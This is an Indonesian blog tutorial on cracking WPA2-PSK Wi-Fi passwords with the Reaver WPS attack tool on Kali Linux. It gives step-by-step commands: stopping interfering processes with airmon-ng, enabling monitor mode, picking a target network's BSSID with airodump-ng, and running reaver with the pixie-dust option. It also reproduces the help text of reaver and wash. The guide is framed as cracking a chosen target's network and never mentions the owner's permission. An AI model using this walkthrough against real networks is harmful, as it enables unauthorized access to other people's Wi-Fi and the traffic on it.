
REAVER, Hack Wifi WPA2-PSK dengan Linux 2025

Hack Wifi dengan Reaver Linux – Hari ini kami memberikan tutorial cara hack password wifi wpa2-psk dengan menggunakan tool Kali Linux yaitu Reaver.

Reaver merupakan tool Linux OS yang digunakan untuk pengujian network penetration testing dengan memecah PIN dan menemukan password dari Wifi WPA/WPA2.

Tanpa basa-basi lagi, langsung saja trik hacking ini “Cara menggunakan Reaver untuk hack wifi wpa2-psk.

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Hack Wifi WPA2-PSK dengan Reaver Linux

Daftar Tool Hack WiFi Kali Linux
Hack WiFi Kali Linux

Namun jika anda belum menginstal Reaver kalian bisa menggunakan kode berikut:

sudo apt install reaver

Setelah terinstal kita lanjut ke step hack wifi dengan reaver sebagai berikut:

1. Open terminal dan cari tahu nama wireless Adapter Anda.

Pada terminal ketik ifconfig (wireless adapter kami wlan0)

REAVER : Hack Wifi WPA2-PSK dengan Linux ifconfig

2. Lalu pada terminal ketik command airmon-ng check kill setelahnya ketik lagi airmon-ng check 

REAVER : Hack Wifi WPA2-PSK dengan Linux airmon-ng check kill

3. Aktifkan mode monitor. Kita menggunakan tool linux airmon-ng untuk membuat virtual interfaces yang disebut dengan mon.

Ketik perintah airmon-ng start wlan0

REAVER : Hack Wifi WPA2-PSK dengan Linux airmon-ng start wlan0

4. Mulai mengcapture packets. Kita akan menggunakan airodump-ng untuk mengcapture/ membaca setiap aktifitas jaringan/ packets wifi sekitar. Anda akan menemukan nama wifi yang ingin Anda hack (target).

Ketik airodump-ng wlan0mon

REAVER : Hack Wifi WPA2-PSK dengan Linux airodump-ng wlan0mon

Kemudian press Ctrl+c untuk mengcopy BSSID wifi target atau tandai dan klik kanan lalu copy

REAVER : Hack Wifi WPA2-PSK dengan Linux bssid wifi

5. Dengan BSSID yang sudah di copy, lalu gabungkan dengan command berikut.

reaver -i wlan0mon -b (BSSID) -vv -K 1

Contoh :reaver -i wlan0mon -b B0:5G:54:96:G7:70 -vv -K 1

REAVER : Hack Wifi WPA2-PSK dengan Linux command


REAVER : Hack Wifi WPA2-PSK dengan Linux password wpa

*Pastikan wifi target Anda WPA2-PSK dengan WPS Enable (WPS Aktif) bukan WPA2-PSK WPS Disable (tidak aktif),  namun dicoba saja.

Kode Perintah Reaver Linux

Berikut ini kode perintah reaver lengkap untuk hack wifi atau WPS Cracker.

Perintah WPS Cracker Reaver:

root@kali:~# reaver -h

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com

Required Arguments:
-i, –interface=<wlan> Name of the monitor-mode interface to use
-b, –bssid=<mac> BSSID of the target AP

Optional Arguments:
-m, –mac=<mac> MAC of the host system
-e, –essid=<ssid> ESSID of the target AP
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
-s, –session=<file> Restore a previous session file
-C, –exec=<command> Execute the supplied command upon successful pin recovery
-f, –fixed Disable channel hopping
-5, –5ghz Use 5GHz 802.11 channels
-v, –verbose Display non-critical warnings (-vv or -vvv for more)
-q, –quiet Only display critical messages
-h, –help Show help

Advanced Options:
-p, –pin=<wps pin> Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
-d, –delay=<seconds> Set the delay between pin attempts [1]-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]-g, –max-attempts=<num> Quit after num pin attempts
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, –timeout=<seconds> Set the receive timeout period [10]-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]-A, –no-associate Do not associate with the AP (association must be done by another application)
-N, –no-nacks Do not send NACK messages when out of order packets are received
-S, –dh-small Use small DH keys to improve crack speed
-L, –ignore-locks Ignore locked state reported by the target AP
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
-J, –timeout-is-nack Treat timeout as NACK (DIR-300/320)
-F, –ignore-fcs Ignore frame checksum errors
-w, –win7 Mimic a Windows 7 registrar [False]-K, –pixie-dust Run pixiedust attack
-Z Run pixiedust attack
-O, –output-file=<filename> Write packets of interest into pcap file

reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv

WPS Cracker – Reaver

Perintah Wash Reaver:

root@kali:~# wash -h

Wash v1.6.6 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

Required Arguments:
-i, –interface=<iface> Interface to capture packets on
-f, –file [FILE1 FILE2 FILE3 …] Read packets from capture files

Optional Arguments:
-c, –channel=<num> Channel to listen on [auto]-n, –probes=<num> Maximum number of probes to send to each AP in scan mode [15]-O, –output-file=<filename> Write packets of interest into pcap file
-F, –ignore-fcs Ignore frame checksum errors
-2, –2ghz Use 2.4GHz 802.11 channels
-5, –5ghz Use 5GHz 802.11 channels
-s, –scan Use scan mode
-u, –survey Use survey mode [default]-a, –all Show all APs, even those without WPS
-j, –json print extended WPS info as json
-U, –utf8 Show UTF8 ESSID (does not sanitize ESSID, dangerous)
-p, –progress Show percentage of crack progress
-h, –help Show help

wash -i wlan0mon

$ Wash – Reaver

Lengkapnya untuk kode reaver kalian bisa lihat DISINI.

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